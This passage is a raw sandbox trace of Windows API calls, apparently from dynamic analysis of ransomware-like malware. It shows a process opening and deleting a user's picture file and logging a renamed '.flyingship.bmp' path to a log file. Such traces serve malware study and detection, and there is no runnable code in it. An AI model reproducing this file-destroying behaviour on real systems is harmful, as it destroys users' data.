(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0190.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.268] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0190.268] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\upfzg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0190.269] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.269] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.269] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.269] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.269] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0190.270] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.270] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.270] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.270] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.270] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.270] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.270] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.270] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0190.270] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.270] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.271] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.271] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.271] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.271] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.271] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp", lpFilePart=0x0) returned 0x4e [0190.271] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d69370, ftCreationTime.dwHighDateTime=0x1d5d92b, ftLastAccessTime.dwLowDateTime=0xa1f44280, ftLastAccessTime.dwHighDateTime=0x1d5e558, ftLastWriteTime.dwLowDateTime=0x16a336e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4969, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="uPfzg.bmp", cAlternateFileName="")) returned 0x90ae18 [0190.271] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\upfzg.bmp")) returned 1 [0190.273] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d69370, ftCreationTime.dwHighDateTime=0x1d5d92b, ftLastAccessTime.dwLowDateTime=0xa1f44280, ftLastAccessTime.dwHighDateTime=0x1d5e558, ftLastWriteTime.dwLowDateTime=0x16a336e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4969, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="uPfzg.bmp", cAlternateFileName="")) returned 0 [0190.273] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.273] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.274] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.274] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.274] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.274] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.274] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.274] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.274] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.275] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.275] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.275] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0190.276] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.276] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.276] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0190.276] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2efd, lpOverlapped=0x0) returned 1 [0190.276] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0190.276] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2efd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.276] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0190.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.flyingship.bmp\r\n", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0190.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5c) returned 0x9a5de0 [0190.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.flyingship.bmp\r\n", cchWideChar=92, lpMultiByteStr=0x9a5de0, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.flyingship.bmp\r\n", lpUsedDefaultChar=0x0) returned 92 [0190.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0190.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0190.277] WriteFile (in: hFile=0x160, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5b, lpOverlapped=0x0) returned 1 [0190.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0190.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.277] CloseHandle (hObject=0x160) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907340 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0190.280] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0190.280] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0190.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0190.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.282] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0190.282] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.282] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.282] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0190.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0190.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0190.283] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0190.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0190.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 